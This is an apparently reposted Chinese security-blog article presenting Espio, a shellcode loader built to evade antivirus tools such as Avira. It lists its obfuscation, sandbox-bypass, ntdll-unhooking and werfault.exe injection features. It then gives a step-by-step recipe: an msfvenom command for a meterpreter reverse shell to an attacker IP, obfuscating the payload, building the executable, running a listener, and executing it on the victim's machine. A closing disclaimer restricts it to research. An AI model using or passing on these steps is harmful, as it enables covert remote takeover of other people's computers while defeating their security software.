特征- 混淆 - 使用随机生成的密钥进行 base64 编码和 XOR 加密。
- Sandbox Bypass - 自定义休眠功能。
- DLL Unhooking - ntdll.dll 的完全脱钩
- 进程注入 - 将有效负载注入 werfault.exe
用法
1.克隆存储库:
git clone https://github.com/Konis-Bros/Espio.git2.生成Shell代码。在此演示中,我们将在 kali 机器中使用 msfvenom:
msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=<Attacker IP> LPORT=1337 -f raw -o shellcode3.将shellcode放入克隆的仓库中,使用obfuscator.py工具进行混淆:
python3 obfuscator.py shellcode注意:然后我们的 shellcode 使用key.bin密钥被混淆为obfuscatedPayload.bin并保存在 loader/Espio 中。
4.打开 loader/Espio.sln,Visual Studio 解决方案文件。
5.构建项目。请注意,可执行文件将位于 loader/x64/Debug/Espio.exe。
6.在攻击者的机器上,侦听定义端口上的 TCP 连接。在我们的例子中,在端口 1337 上运行 metasploit 的 multi/handler。
7.将可执行文件放到受害者的机器上并运行它。
建议
-
在第 2 步和第 6 步中,通过 HTTPS 创建 meterpreter 会话。有关详细信息,请参阅Meterpreter HTTP/HTTPS 通信。 -
在第 5 步中,将构建配置从 Debug 更改为 Release。请注意,可执行文件现在位于 loader/x64/Release/Espio.exe。
小红伞 Prime:
AV
项目地址:
https://github.com/Konis-Bros/Espio
原文始发于微信公众号(Ots安全):【免杀系列】Espio 过小红伞、AV
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论